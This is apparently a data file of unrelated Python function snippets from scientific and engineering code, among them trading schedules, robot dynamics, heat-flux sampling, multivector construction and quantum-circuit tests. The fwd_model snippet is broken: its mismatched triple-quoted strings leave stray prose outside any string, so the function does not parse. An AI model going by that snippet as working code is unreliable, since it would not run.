market)\n schedule_function(sellAll, date_rules.every_day(), time_rules.market_close(minutes=15))\n #Coordinate trades every minute. in the given range (minTime). Note that half days will not be traded and that the end of the range is 370 minutes after market open (369 - ie 21 minutes prior to market close)\n \n endDay=185 #Time to stop correlating and start trading (lets half a trading days worth of correlation be included)\n startTrade=endDay+2\n endTrade=370\n \n for minTime in range(startTrade,endTrade,1):\n \tschedule_function(coordTrade, date_rules.every_day(), time_rules.market_open(minutes = minTime), half_days=False)\n schedule_function(getIdealSec, date_rules.every_day(), time_rules.market_open(minutes = endDay))\n set_commission(commission.PerShare(cost=0.0, min_trade_cost=0.0))", "def F_trans(self):\n common_scale = self.edp_par['common_scale'].value\n R_HM = self.edp_par['R_HM'].value\n X_h = self.edp_par['X_h'].value\n psi = self.edp_par['psi'].value \n arg = self.qz*X_h*np.cos(psi) - self.qx*X_h*np.sin(psi)\n return common_scale * (R_HM*np.cos(arg) - 1)", "def calc_Cinv_CCGT(CC_size_W, CCGT_cost_data):\n\n # if the Q_design is below the lowest capacity available for the technology, then it is replaced by the least\n # capacity for the corresponding technology from the database\n if CC_size_W < CCGT_cost_data['cap_min'][0]:\n CC_size_W = CCGT_cost_data['cap_min'][0]\n CCGT_cost_data = CCGT_cost_data[\n (CCGT_cost_data['cap_min'] <= CC_size_W) & (CCGT_cost_data['cap_max'] > CC_size_W)]\n\n\n #costs of connection\n connection_costs = ngas.calc_Cinv_gas(CC_size_W)\n\n Inv_a = CCGT_cost_data.iloc[0]['a']\n Inv_b = CCGT_cost_data.iloc[0]['b']\n Inv_c = CCGT_cost_data.iloc[0]['c']\n Inv_d = CCGT_cost_data.iloc[0]['d']\n Inv_e = CCGT_cost_data.iloc[0]['e']\n Inv_IR = CCGT_cost_data.iloc[0]['IR_%']\n Inv_LT = CCGT_cost_data.iloc[0]['LT_yr']\n Inv_OM = CCGT_cost_data.iloc[0]['O&M_%'] / 100\n\n InvC = Inv_a + Inv_b * (CC_size_W) ** Inv_c + (Inv_d + Inv_e * CC_size_W) * log(CC_size_W)\n\n Capex_a_CCGT_USD = calc_capex_annualized((InvC+connection_costs), Inv_IR, Inv_LT)\n Opex_fixed_CCGT_USD = InvC * Inv_OM\n Capex_CCGT_USD = InvC\n\n return Capex_a_CCGT_USD, Opex_fixed_CCGT_USD, Capex_CCGT_USD", "def _calc_C(self, lambdify=True):\n\n C = None\n C_func = None\n # check to see if we have our term saved in 
file\n C, C_func = self._load_from_file('C', lambdify)\n\n if C is None and C_func is None:\n # if no saved file was loaded, generate function\n print('Generating centrifugal and Coriolis compensation function')\n\n # first get the inertia matrix\n M = self._calc_M(lambdify=False)\n\n # C_{kj} = sum_i c_{ijk}(q) \\dot{q}_i\n # c_{ijk} = 1/2 * sum_i (\\frac{\\partial M_{kj}}{\\partial q_j} +\n # \\frac{\\partial M_{ki}}{\\partial q_j} - \\frac{\\partial M_{ij}}\n # {\\partial q_k})\n C = sp.zeros(self.N_JOINTS, self.N_JOINTS)\n for kk in range(self.N_JOINTS):\n for jj in range(self.N_JOINTS):\n for ii in range(self.N_JOINTS):\n dMkjdqi = M[kk, jj].diff(self.q[ii])\n dMkidqj = M[kk, ii].diff(self.q[jj])\n dMijdqk = M[ii, jj].diff(self.q[kk])\n C[kk, jj] += .5 * (dMkjdqi + dMkidqj - dMijdqk) * self.dq[ii]\n C[kk, jj] = C[kk, jj]\n C = sp.Matrix(C)\n\n # save to file\n abr_control.utils.os_utils.makedirs(\n '%s/C' % self.config_folder)\n cloudpickle.dump(C, open(\n '%s/C/C' % self.config_folder, 'wb'))\n\n if lambdify is False:\n # if should return expression not function\n return C\n\n if C_func is None:\n C_func = self._generate_and_save_function(\n filename='C', expression=C,\n parameters=self.q+self.dq)\n return C_func", "def test_cfu(self):\n DATA = [\n # byte add\n ((0, 0, 0), 0),\n ((0, 0x01020304, 0x01020304), 20),\n ((0, 0x01010101, 0xffffffff), 1024),\n # byte swap\n ((1, 0x01020304, 0xffffffff), 0x04030201),\n ((1, 0x0102ff00, 0xffffffff), 0x00ff0201),\n # bit swap\n ((2, 0x01020304, 0xffffffff), 0x20c04080),\n ((2, 0xffffffff, 0xffffffff), 0xffffffff),\n ((2, 0x10203040, 0xffffffff), 0x020c0408),\n # Factorial\n ((3, 1, 0), 1),\n ((3, 2, 0), 2),\n ((3, 3, 0), 6),\n ((3, 4, 0), 24),\n ]\n\n def process():\n for n, (inputs, expected_output) in enumerate(DATA):\n func, i0, i1 = inputs\n yield self.dut.cmd_function_id.eq(func)\n yield self.dut.cmd_in0.eq(i0)\n yield self.dut.cmd_in1.eq(i1)\n yield self.dut.cmd_valid.eq(1)\n yield self.dut.rsp_ready.eq(0)\n yield\n yield self.dut.cmd_valid.eq(0)\n yield self.dut.rsp_ready.eq(1)\n yield Delay(0.1)\n assert (yield from self.wait_response_valid()), (\n \"op{func}({i0:08X}, {i1:08X}) failed to complete\")\n actual_output = (yield self.dut.rsp_out)\n assert actual_output == expected_output, (\n f\"\\nHEX: op{func}(0x{i0:08X}, 0x{i1:08X}) expected: {expected_output:08X} got: {actual_output:08X}\" +\n f\"\\nDEC: op{func}(0x{i0}, 0x{i1}) expected: {expected_output} got: {actual_output}\")\n yield\n self.run_sim(process, True)", "def __init__(self, f, N_elements, C, D, analytical, grid_points):\n\n\n\n self.Ne = N_elements\n self.gp = grid_points\n self.C = C\n self.D = D\n self.f = lambda x: f(x)\n self.tol = 10e-4\n self.x = sym.Symbol(\"x\")\n\n self.h = 1/(2*self.Ne)\n self.global_matrix = np.zeros([2*self.Ne, 2*self.Ne])\n self.global_vector = np.zeros([2*self.Ne])\n self.psi = sym.zeros(3*self.Ne,1)\n\n self.analytical = lambda x,C,D: analytical(x,C,D)\n\n self.x_values = np.linspace(0,1,self.gp)", "def fc(self, x = np.zeros(4) , u = np.zeros(3) , t = 0 ):\n \n dx = np.zeros(self.n) # State derivative vector\n \n [ q , dq ] = self.x2q( x ) # from state vector (x) to angle and speeds (q,dq)\n \n ddq = self.ddq_a( q , dq , u[0:self.dof] , u[self.dof] , t )\n \n dx = self.q2x( dq , ddq ) # from angle and speeds diff (dq,ddq) to state vector diff (dx)\n \n return dx", "def fc(self, x = np.zeros(4) , u = np.zeros(3) , t = 0 ):\n \n dx = np.zeros(self.n) # State derivative vector\n \n [ q , dq ] = self.x2q( x ) # from state vector (x) to angle 
and speeds (q,dq)\n \n ddq = self.ddq_a( q , dq , u[0:self.dof] , u[self.dof] , t )\n \n dx = self.q2x( dq , ddq ) # from angle and speeds diff (dq,ddq) to state vector diff (dx)\n \n return dx", "def _fv(self):\n return self.beta * (self.x ** self.c)", "def fc(self, x = np.zeros(2) , u = np.array([0,1]) , t = 0 ):\n \n dx = np.zeros(self.n) # State derivative vector\n \n q = x[0]\n dq = x[1]\n \n ddq = self.ddq_a( q , dq , u[0] , u[1] ) # Include hybrid input\n \n dx[0] = dq\n dx[1] = ddq\n \n return dx", "def __call__ (self, x) :\n fx = fixed_q_exp (x)\n result = fx (self)\n return result", "def fwd_model(Ti_samples,To_samples, dw_samples, kw_samples,hi_samples,ho_samples,TA_samples):\n\t#Determine number of samples (totquat)\n\ttotquat=len(Ti_samples)\n\t# List to store values of Q (assuming no radiative heat transfer) calculated from\n\t# the random samples of the parameters\n\tQ_samples_4PCE=[]\n\t# List to store values of Q assuming radiative heat transfer occurs\n\t#Q_r_samples_4PCE=[]\n\t# Calculate values of heat flux Q (assuming no radiative heat transfer)\n\t# for the different sample values and append to the list\n\tfor i in range(totquat):\n\t\t(Q,T1,T2)=compute_heat_flux(Ti_samples[i], To_samples[i], dw_samples[i],\\\n\t\t\tkw_samples[i], hi_samples[i], ho_samples[i])\n\t\tQ_samples_4PCE.append(Q)\n\t\t# Calculate values of heat flux Q assuming radiative heat transfer to atmosphere and append to list\n\t\t# For the required estimates of Q,T1, and T2 needed to solve the nonlinear system,\n\t\t# we use the values obtained by solving the system assuming no radiative heat transfer\n\t\t\"\"\"Q2=r_heat_flux(Ti_samples[i], To_samples[i], dw_samples[i], kw_samples[i],\\\n\t\t\thi_samples[i], ho_samples[i], TA_samples[i], (Q,T1,T2))\n\t\tQ_r_samples_4PCE.append(Q2)\n\t# Convert Q_r_samples_4PCE to numpy array\n\tQ_evals = np.array(Q_r_samples_4PCE)\n\treturn Q_evals\"\"\"\n\t\tConvert Q_samples_4PCE to numpy array\n\t\tQ_evals = np.array(Q_samples_4PCE)\n\t\treturn Q_evals\"\"\"\n\n\ndef KDE(fcn_evals):\n\t\"\"\"\n\tPerforms kernel density estimation\n\tInput:\n\t\tfcn_evals: numpy array of evaluations of the forward model (values of heat flux Q)\n\tOutput:\n\t\txpts_pce: numpy array of points at which the PDF is estimated.\n\t\tPDF_data_pce: numpy array of estimated PDF values.\n\t\"\"\"\n\t# Perform KDE on fcn_evals\n\tkern_pce=stats.kde.gaussian_kde(fcn_evals)\n\t# Generate points at which to evaluate the PDF\n\txpts_pce=np.linspace(fcn_evals.min(),fcn_evals.max(),200)\n\t# Evaluate the estimated PDF at these points\n\tPDF_data_pce=kern_pce(xpts_pce)\n\treturn xpts_pce, PDF_data_pce", "def __init__(self, base=None, mvtype=None, fct=False, blade_rep=False):\n\n def make_scalar(self, base): # make a scalar (grade 0)\n if isinstance(base, str):\n if self.fct:\n self.obj = Function(base)(*MV.coords) * MV.ONE\n else:\n self.obj = make_coef(self, base) * MV.ONE\n else:\n self.obj = base * MV.ONE\n self.igrade = 0\n self.blade_rep = True\n return self\n\n def make_vector(self, base): # make a vector (grade 1)\n if isinstance(base, str):\n if self.fct:\n base_lst = str_combinations(base, MV.coords, rank=1, mode='__')\n fct_lst = fct_sym_array(base_lst, MV.coords)\n self.obj = reduce(operator.add, tuple(map(lambda x: x[0] * x[1], zip(fct_lst, MV.blades[1]))))\n else:\n if MV.coords is not None:\n base_lst = str_combinations(base, MV.coords, rank=1, mode='__')\n else:\n base_lst = str_combinations(base, MV.subscripts, rank=1, mode='__')\n fct_lst = fct_sym_array(base_lst, None)\n self.obj = 
reduce(operator.add, tuple(map(lambda x: x[0] * x[1], zip(fct_lst, MV.blades[1]))))\n else:\n result = S.Zero\n for (coef, base) in zip(base, MV.blades[1]):\n result += coef * base\n self.obj = result\n self.igrade = 1\n self.blade_rep = True\n return self\n\n def make_basisvector(self, base):\n raise NotImplementedError(\"Don't know how to compute basis vectors of class %\" % self.__class__)\n\n def make_basisbivector(self, base):\n raise NotImplementedError(\"Don't know how to compute basis bivectors of class %\" % self.__class__)\n\n def make_grade(self, base): # if base is 'A,n' then make a grade n multivector\n if isinstance(base, str):\n base_lst = base.split(',')\n base = base_lst[0]\n n = int(base_lst[1])\n if self.fct:\n base_lst = str_combinations(base, MV.coords, rank=n, mode='__')\n fct_lst = fct_sym_array(base_lst, MV.coords)\n self.obj = reduce(operator.add, tuple(map(lambda x: x[0] * x[1], zip(fct_lst, MV.blades[n]))))\n else:\n if MV.coords is not None:\n base_lst = str_combinations(base, MV.coords, rank=n, mode='__')\n else:\n base_lst = str_combinations(base, MV.subscripts, rank=n, mode='__')\n fct_lst = fct_sym_array(base_lst, None)\n self.obj = reduce(operator.add, tuple(map(lambda x: x[0] * x[1], zip(fct_lst, MV.blades[n]))))\n else:\n raise TypeError('Cannot make_grade for base = %s' % base)\n self.igrade = n\n self.blade_rep = True\n return self\n\n def make_grade2(self, base): # grade 2 multivector\n if isinstance(base, str):\n if self.fct:\n base_lst = str_combinations(base, MV.coords, rank=2, mode='__')\n fct_lst = fct_sym_array(base_lst, MV.coords)\n self.obj = reduce(operator.add, tuple(map(lambda x: x[0] * x[1], zip(fct_lst, MV.blades[2]))))\n else:\n if MV.coords is not None:\n base_lst = str_combinations(base, MV.coords, rank=2, mode='__')\n else:\n base_lst = str_combinations(base, MV.subscripts, rank=2, mode='__')\n fct_lst = fct_sym_array(base_lst, None)\n self.obj = reduce(operator.add, tuple(map(lambda x: x[0] * x[1], zip(fct_lst, MV.blades[2]))))\n else:\n raise TypeError('!!!!Cannot make_grade2 for base = ' + str(base) + '!!!!\\n')\n self.igrade = 2\n self.blade_rep = True\n return self\n\n def make_pseudo(self, base): # multivector of grade MV.dim\n if isinstance(base, str):\n if self.fct:\n base_lst = str_combinations(base, MV.coords, rank=MV.dim, mode='__')\n fct_lst = fct_sym_array(base_lst, MV.coords)\n self.obj = reduce(operator.add, tuple(map(lambda x: x[0] * x[1], zip(fct_lst, MV.blades[MV.dim]))))\n else:\n if MV.coords is not None:\n base_lst = str_combinations(base, MV.coords, rank=MV.dim, mode='__')\n else:\n base_lst = str_combinations(base, MV.subscripts, rank=MV.dim, mode='__')\n fct_lst = fct_sym_array(base_lst, None)\n self.obj = reduce(operator.add, tuple(map(lambda x: x[0] * x[1], zip(fct_lst, MV.blades[MV.dim]))))\n else:\n raise TypeError('!!!!Cannot make_pseudo for base = ' + str(base) + '!!!!\\n')\n self.igrade = MV.dim\n self.blade_rep = True\n return self\n\n def make_spinor(self, base): # multivector with all even grades\n if isinstance(base, str):\n if self.fct:\n self.obj = Function(base)(*MV.coords) * MV.ONE\n else:\n self.obj = Symbol(base) * MV.ONE\n for rank in range(2, MV.dim1, 2):\n if self.fct:\n base_lst = str_combinations(base, MV.coords, rank=rank, mode='__')\n fct_lst = fct_sym_array(base_lst, MV.coords)\n self.obj += reduce(operator.add, tuple(map(lambda x: x[0] * x[1], zip(fct_lst, MV.blades[rank]))))\n else:\n if MV.coords is not None:\n base_lst = str_combinations(base, MV.coords, rank=rank, mode='__')\n 
else:\n base_lst = str_combinations(base, MV.subscripts, rank=rank, mode='__')\n fct_lst = fct_sym_array(base_lst, None)\n self.obj += reduce(operator.add, tuple(map(lambda x: x[0] * x[1], zip(fct_lst, MV.blades[rank]))))\n else:\n raise TypeError('Cannot make_mv for base = %s' % base)\n self.igrade = -1\n self.blade_rep = True\n return self\n\n def make_mv(self, base):\n if isinstance(base, str):\n if self.fct:\n self.obj = Function(base)(*MV.coords) * MV.ONE\n else:\n self.obj = Symbol(base) * MV.ONE\n for rank in range(1, MV.dim1):\n if self.fct:\n base_lst = str_combinations(base, MV.coords, rank=rank, mode='__')\n fct_lst = fct_sym_array(base_lst, MV.coords)\n self.obj += reduce(operator.add, tuple(map(lambda x: x[0] * x[1], zip(fct_lst, MV.blades[rank]))))\n else:\n if MV.coords is not None:\n base_lst = str_combinations(base, MV.coords, rank=rank, mode='__')\n else:\n base_lst = str_combinations(base, MV.subscripts, rank=rank, mode='__')\n fct_lst = fct_sym_array(base_lst, None)\n self.obj += reduce(operator.add, tuple(map(lambda x: x[0] * x[1], zip(fct_lst, MV.blades[rank]))))\n else:\n raise TypeError('!!!!Cannot make_mv for base = ' + str(base) + '!!!!\\n')\n self.igrade = -1\n self.blade_rep = True\n return self\n\n MVtypes = {'scalar': make_scalar,\n 'vector': make_vector,\n 'basisvector': make_basisvector,\n 'basisbivector': make_basisbivector,\n 'grade': make_grade,\n 'grade2': make_grade2,\n 'bivector': make_grade2,\n 'pseudo': make_pseudo,\n 'spinor': make_spinor,\n 'mv': make_mv}\n\n self.fct = fct\n self.is_base = False\n self.is_grad = False\n self.print_blades = MV.print_blades\n self.fmt = 1\n\n if mvtype is None:\n if base in (None, S.Zero): # Default is zero multivector\n self.blade_rep = True\n self.obj = S.Zero\n self.igrade = 0\n elif isinstance(base, str): # Base or blade basis multivector\n self.is_base = True\n if '*' in base:\n self.blade_rep = False\n self.igrade = -1\n else:\n if '^' in base:\n self.blade_rep = True\n self.igrade = base.count('^') + 1\n else:\n self.blade_rep = blade_rep\n self.igrade = 1\n self.obj = Symbol(base, commutative=False)\n elif isinstance(base, MV): # Copy constructor\n self.blade_rep = base.blade_rep\n self.obj = base.obj\n self.igrade = base.igrade\n self.fct = base.fct\n self.is_base = base.is_base\n self.is_grad = base.is_grad\n elif isinstance(base, (Expr, Symbol)): # Gets properties of multivector from Expr\n if base.is_commutative:\n self.obj = base * MV.ONE\n self.blade_rep = True\n self.igrade = 0\n else:\n if isinstance(base, (Add, Mul)): # Complex expression\n MV.characterize_expression(self, base)\n elif isinstance(base, Symbol):\n if not base.is_commutative:\n if base == MV.ONE:\n self.obj = base\n self.blade_rep = True\n self.igrade = 0\n elif base in MV.blades_flat: # basis blade\n self.obj = base\n self.blade_rep = True\n self.igrade = MV.blade_grades[base]\n elif base in MV.bases_flat: # basis base\n self.obj = base\n self.blade_rep = False\n self.igrade = -1\n else:\n raise ValueError('MV(' + str(base) + ') is not allowed in constructor\\n' +\n 'non-commutative argument is not a base\\n')\n else: # scalar sympy symbol\n self.obj = base * MV.ONE\n self.igrade = 0\n self.blade_rep = True\n elif isinstance(base, Number):\n self.obj = base * MV.ONE\n self.igrade = 0\n self.blade_rep = True\n else: # Preconfigured multivector types\n MVtypes[mvtype](self, base)", "def test_implantation_flux_with_time_dependancy():\n flux = sp.Piecewise((1, festim.t < 10), (0, True))\n imp_depth = 5e-9\n width = 5e-9\n distribution = 
(\n 1\n / (width * (2 * np.pi) ** 0.5)\n * sp.exp(-0.5 * ((festim.x - imp_depth) / width) ** 2)\n )\n expected_value = sp.printing.ccode(flux * distribution)\n\n my_source = festim.ImplantationFlux(flux=flux, imp_depth=5e-9, width=5e-9, volume=1)\n\n assert my_source.value._cppcode == expected_value", "def F_trans(self):\n rho_H1 = self.edp_par['rho_H1'].value\n Z_H1 = self.edp_par['Z_H1'].value\n sigma_H1 = self.edp_par['sigma_H1'].value\n rho_M = self.edp_par['rho_M'].value\n sigma_M = self.edp_par['sigma_M'].value\n psi = self.edp_par['psi'].value \n common_scale = self.edp_par['common_scale'].value\n \n # Calculate the intermediate variables\n alpha = self.qz*cos(psi) - self.qx*sin(psi)\n Z_CH2 = Z_H1 - sigma_H1\n Z_W = Z_H1 + sigma_H1\n DeltaZ_H = Z_W - Z_CH2\n \n # Calculate the Gaussian part \n FG = -rho_M*sigma_M * exp(-0.5*(alpha*sigma_M)**2)\n FG += 2*rho_H1*sigma_H1 * cos(alpha*Z_H1) * exp(-0.5*(alpha*sigma_H1)**2)\n FG *= np.sqrt(2*pi)\n \n # Calculate the strip part\n FS = -2 * sin(alpha*Z_CH2) / alpha\n \n # Calculate the bridging part\n FB = 1 / (alpha + pi/DeltaZ_H)\n FB += 1 / (alpha - pi/DeltaZ_H)\n FB *= sin(alpha*Z_W) + sin(alpha*Z_CH2)\n FB *= 0.5\n FB -= (sin(alpha*Z_W)-sin(alpha*Z_CH2)) / alpha\n \n return common_scale * (FG + FS + FB)", "def calculateElementCoefficients(self):\n #\n #get u,grad(u), and grad(u)Xgrad(w) at the quadrature points\n #\n for cj in range(self.nc):\n self.u[cj].getValues(self.q[('v',cj)],\n self.q[('u',cj)])\n if self.q.has_key(('grad(u)',cj)):\n self.u[cj].getGradientValues(self.q[('grad(v)',cj)],\n self.q[('grad(u)',cj)])\n #\n #get functions of (t,x,u) at the quadrature points\n #\n self.coefficients.evaluate(self.timeIntegration.t,self.q)\n log(\"Coefficients on element\",level=10,data=self.q)\n #\n # time integration is handled directly in ELLAM weak approximation, don't have a hook for\n # doing that via a time integration object (could if it were a direct Lagrange Galerkin formulation I believe)\n # however, need to set time integration's m_tmp if use that anywhere\n #if self.timeTerm:\n # self.timeIntegration.calculateElementCoefficients(self.q)\n\n #todo eventually can add nonlinear potential here\n\n #cek and mwf need to go through this section to clean up, some of next two blocks could go to calcQuad\n #\n #todo need non-diagonal dependence?\n for ci in range(self.nc):\n cfemIntegrals.calculateCFLADR(self.elementEffectiveDiametersArray,\n self.q[('dm',ci,ci)],\n self.q[('df',ci,ci)],#could just be velocity\n self.q[('cfl',ci)])", "def __call__(self, frame_num):\n quant_sys = self.quant_sys\n quant_sys.propagate(10)\n\n # propagate the wigner function\n self.img_clasical_rho.set_array(\n (quant_sys.D22 + quant_sys.D11).real\n #quant_sys.get_classical_rho()\n )\n\n self.img_Upsilon2.set_array(\n quant_sys.quantum_rho.real\n )\n\n return self.img_clasical_rho, self.img_Upsilon2", "def proximal(self):\n functional = self\n\n class EntRegOptTransProximal(Operator):\n\n \"\"\"Proximal operator of entropy regularized optimal transport.\n\n The prox is given by::\n\n prox_[gamma*T_eps](mu1) = arg min_x (T_epsilon(mu0, x) +\n 1/(2*gamma) ||x - mu1||^2_2)\n \"\"\"\n\n def __init__(self, sigma):\n \"\"\"Initialize a new instance.\n\n Parameters\n ----------\n sigma : positive float\n \"\"\"\n self.sigma = float(sigma)\n super().__init__(domain=functional.domain,\n range=functional.domain, linear=False)\n\n # Setting up parameters\n self.const = 1 / (functional.epsilon * sigma)\n\n def _call(self, x):\n \"\"\"Apply the operator to 
``x``.\"\"\"\n u = functional.tmp_u_prox\n v = functional.tmp_v_prox\n\n # Running generalized Sinkhorn iterations\n for j in range(functional.niter):\n # Safe-guarded u-update, to avoid divide-by-zero error.\n u_old = u.copy()\n tmp1 = functional.K_op(v)\n if np.min(tmp1) < 1e-30 or np.max(tmp1) > 1e+50:\n print('Numerical instability, truncation in Transport prox (Kv)',\n str(np.min(tmp1)), str(np.max(tmp1)))\n\n tmp = np.fmax(tmp1, 1e-30)\n\n\n u = functional.mu0 / tmp\n if np.min(u) < 1e-30 or np.max(u) > 1e+50:\n print('u (min/max)', str(np.min(u)), str(np.max(u)))\n\n # Safe-guarded v-update, to avoid divide-by-zero error.\n v_old = v.copy()\n\n tmp3 = functional.K_op_adjoint(u)\n if np.min(tmp3) < 1e-30 or np.max(tmp3) > 1e+50:\n print('Truncation in Transport prox (KTu)',\n str(np.min(tmp3)), str(np.max(tmp3)))\n print('u (min/max)', str(np.min(u)), str(np.max(u)))\n\n tmp4 = (self.const * tmp3 * np.exp(self.const * x))\n\n if np.min(tmp4) < 1e-30 or np.max(tmp4) > 1e+200:\n print('Argument in lambdert omega (min/max)',\n str(np.min(tmp4)), str(np.max(tmp4)))\n\n v = np.exp(self.const * x - lambertw_fulfix(tmp4))\n\n v1 = np.exp(self.const * x - scipy.special.lambertw(\n tmp4))\n if (v-v1).norm() > 1e-10:\n print('diff pga ny lambderw omega funciton',\n str((v-v1).norm()))\n print('v (min/max)', str(np.min(v)), str(np.max(v)))\n print('Argument in lambdert omega (min/max)',\n str(np.min(tmp4)), str(np.max(tmp4)))\n\n # If the updates in both u and v are small, break the loop\n if ((np.log(v)-np.log(v_old)).norm() < 1e-8 and\n (np.log(u)-np.log(u_old)).norm() < 1e-8):\n break\n\n # Store the u and v in the internal temporary variables of the\n # functional\n functional.tmp_u_prox = u\n functional.tmp_v_prox = v\n\n return x - self.sigma * functional.epsilon * np.log(v)\n\n return EntRegOptTransProximal", "def __init__(self, wavefunctions, dt=1., threshold=1e-3, **kwargs):\n\n wavefunctions = np.array(wavefunctions, copy=True)\n\n # normalize the wavefunction over the first axis (basis)\n wavefunctions /= linalg.norm(wavefunctions, axis=1)[:, np.newaxis]\n\n # calculate the alternating sequence of signs for iFFT autocorrelation function\n k = np.arange(wavefunctions.shape[0])\n minus = (-1) ** k[:, np.newaxis]\n\n # energy axis (as prescribed by Method 1 for calculating Fourier transform\n energy_range = (k - k.size / 2) * np.pi / (0.5 * dt * k.size)\n\n # the windowed fft of the wave function with respect to the time axis\n wavefunctions_fft_w = fftpack.ifft(\n minus * wavefunctions * blackman(k.size)[:, np.newaxis],\n axis=0,\n overwrite_x=True\n )\n wavefunctions_fft_w *= minus\n\n\n weight = linalg.norm(wavefunctions_fft_w, axis=1)\n weight /= weight.max()\n\n # extract peaks in weight to get the eigen energies\n peaks, _ = find_peaks(weight, height=threshold, **kwargs)\n #peaks = np.nonzero(weight > threshold)\n\n # the eigenvalues of the Hamiltonian\n energies = energy_range[peaks]\n\n self.weight = weight\n self.energy_range = energy_range\n\n \"\"\"\n #############################################################################################\n\n\n # normalize the auto correlation function\n auto_corr_fft_w /= auto_corr_fft_w.max()\n\n # extract peaks in the auto correlation function to get the eigen energies\n peaks, _ = find_peaks(auto_corr_fft_w, height=threshold, **kwargs)\n\n # the eigenvalues of the Hamiltonian\n energies = energy_range[peaks]\n\n #############################################################################################\n\n # calculate the 
alternating sequence of signs for iFFT wavefunction\n minus = (-1) ** k[:, np.newaxis]\n\n wavefunctions_fft_w = fftpack.ifft(\n minus * wavefunctions * blackman(k.size)[:, np.newaxis],\n axis=0,\n overwrite_x=True\n )\n wavefunctions_fft_w *= minus\n \"\"\"\n\n # extract the eigenfunctions of the unknown hamiltonian\n eigenvects = wavefunctions_fft_w[peaks]\n\n # normalize the eigenfunctions\n eigenvects /= linalg.norm(eigenvects, axis=1)[:, np.newaxis]\n\n # remove the numerical noise by orthogonalizing the extracted basis\n # This is a numerically stable version of the Gramm Schmidt\n eigenvects, _ = linalg.qr(eigenvects.T, mode='economic', overwrite_a=True)\n eigenvects = eigenvects.T\n\n # saving the results of recovering\n self.energies = energies\n self.eigenvects = eigenvects\n\n # save the initial condition\n self.init_wavefunc = wavefunctions[0].copy()", "def get_coupling(self, method='rdt'):\n if method == 'rdt':\n if \"F1001\" not in self._results_df or \"F1010\" not in self._results_df:\n self.calc_rdts(['F1001', 'F1010'])\n res_df = self._results_df.loc[:, ['S', 'F1001', 'F1010']]\n res_df.loc[:, \"F1001\"].real *= -1\n res_df.loc[:, \"F1010\"].real *= -1\n return res_df\n elif method == 'cmatrix':\n if \"F1001_C\" not in self._results_df:\n self.calc_cmatrix()\n res_df = self._results_df.loc[:, ['S', 'F1001_C', 'F1010_C']]\n return res_df.rename(columns=lambda x: x.replace(\"_C\", \"\"))\n else:\n raise ValueError(\"method '{:s}' not recognized.\".format(method))", "def setUp(self):\n self.cashFlowDate=Date(1,October,2018)\n self.fixingDate=Date(1,November,2018)\n self.foreignAmount=1000.0\n self.familyName=\"ECB\"\n self.fixingDays=2\n self.sourceCurrency=USDCurrency()\n self.targetCurrency=EURCurrency()\n self.fixingCalendar=UnitedStates()\n self.todayDate=Date(11, November, 2018)\n self.tsDayCounter=Actual360()\n self.flatForwardUSD=FlatForward(self.todayDate, 0.005, self.tsDayCounter)\n self.sourceYts=RelinkableYieldTermStructureHandle(self.flatForwardUSD)\n self.flatForwardEUR=FlatForward(self.todayDate, 0.03, self.tsDayCounter);\n self.targetYts=RelinkableYieldTermStructureHandle(self.flatForwardEUR)\n self.fxindex=FxIndex(self.familyName,self.fixingDays,self.sourceCurrency,self.targetCurrency,self.fixingCalendar,self.sourceYts,self.targetYts)\n self.fxlinkedcashflow=FXLinkedCashFlow(self.cashFlowDate,self.fixingDate,self.foreignAmount,self.fxindex)", "def test_integration(self):\n\n m = 5 # number of wires in A\n M = 2**m\n\n xmax = np.pi # bound to region [-pi, pi]\n xs = np.linspace(-xmax, xmax, M)\n\n probs = np.array([norm().pdf(x) for x in xs])\n probs /= np.sum(probs)\n\n func = lambda i: np.sin(xs[i]) ** 2\n r_rotations = np.array([2 * np.arcsin(np.sqrt(func(i))) for i in range(M)])\n\n A_wires = [0, \"a\", -1.1, -10, \"bbb\"]\n target_wire = \"Ancilla\"\n wires = A_wires + [target_wire]\n estimation_wires = [\"bob\", -3, 42, \"penny\", \"lane\"]\n\n def fn():\n qml.templates.MottonenStatePreparation(np.sqrt(probs), wires=A_wires)\n r_unitary(qml.RY, r_rotations, control_wires=A_wires[::-1], target_wire=target_wire)\n\n qmc_circuit = qml.quantum_monte_carlo(\n fn, wires=wires, target_wire=target_wire, estimation_wires=estimation_wires\n )\n\n with qml.queuing.AnnotatedQueue() as q:\n qmc_circuit()\n qml.probs(estimation_wires)\n\n tape = qml.tape.QuantumScript.from_queue(q)\n tape = tape.expand(depth=2)\n\n assert all(\n not isinstance(op, (qml.MultiControlledX, qml.templates.QFT, qml.tape.QuantumScript))\n for op in tape.operations\n )\n\n dev = 
qml.device(\"default.qubit\", wires=wires + estimation_wires)\n res = dev.execute(tape)\n\n @qml.qnode(dev)\n def circuit():\n qml.templates.QuantumMonteCarlo(\n probs, func, target_wires=wires, estimation_wires=estimation_wires\n )\n return qml.probs(estimation_wires)\n\n res_expected = circuit()\n assert np.allclose(res, res_expected)", "def C(self, q, dq):\n # check for function in dictionary\n if self._C is None:\n self._C = self._calc_C()\n parameters = tuple(q) + tuple(dq)\n return np.array(self._C(*parameters), dtype='float32')", "def test_MPI_QFT(self):\n shots = 100\n num_qubits = 10\n backend_options = self.BACKEND_OPTS.copy()\n for opt, val in self.MPI_OPTIONS.items():\n backend_options[opt] = val\n\n circuit = transpile(QFT(num_qubits),\n backend=self.SIMULATOR,\n optimization_level=0)\n circuit.measure_all()\n qobj = assemble(circuit, shots=shots, memory=True)\n result = self.SIMULATOR.run(qobj, **backend_options).result()\n\n counts = result.get_counts(circuit)\n #comparing counts with pre-computed counts\n self.assertEqual(counts, self.ref_counts_qft10)", "def tctfdfc(x):\n if isinstance(x,Fdf) :\n pass\n else : \n x = Fdf.constant(x)\n return x", "def run_main(sst, ft_qv, use_NT):\n\n dtout=10. #minutes\n end_time=8*24. #hours\n del_time=dtout*60. #seconds\n end_time=end_time*3600. #seconds\n #sst=297\n D=5.e-6 #s-1\n U=7 #m/s\n psfc=100. #kPa\n qsfc=tf.qs_tp(sst,psfc)\n ft_intercept = 292 #K\n ft_gamma = 6.e-3 #K/m\n #ft_qv = 2.e-3\n k=0.2 #entrainment efficiency\n Cd = 1.e-3 #drag coefficient\n tspan = np.arange(0.,end_time,del_time)\n vars_init=[285.,400.,8.e-3] #theta (K), height (m) qv (kg/kg) to start\n the_tup=dict(D=D,U=U,sst=sst,ft_intercept=ft_intercept,ft_gamma=ft_gamma,\n qsfc=qsfc,ft_qv=ft_qv,k=k,Cd=Cd,radcool=30.,use_NT=use_NT) # include use_NT\n the_tup=make_tuple(the_tup,'coeffs')\n output=integrate.odeint(dmixed_vars, vars_init, tspan,(the_tup,))\n 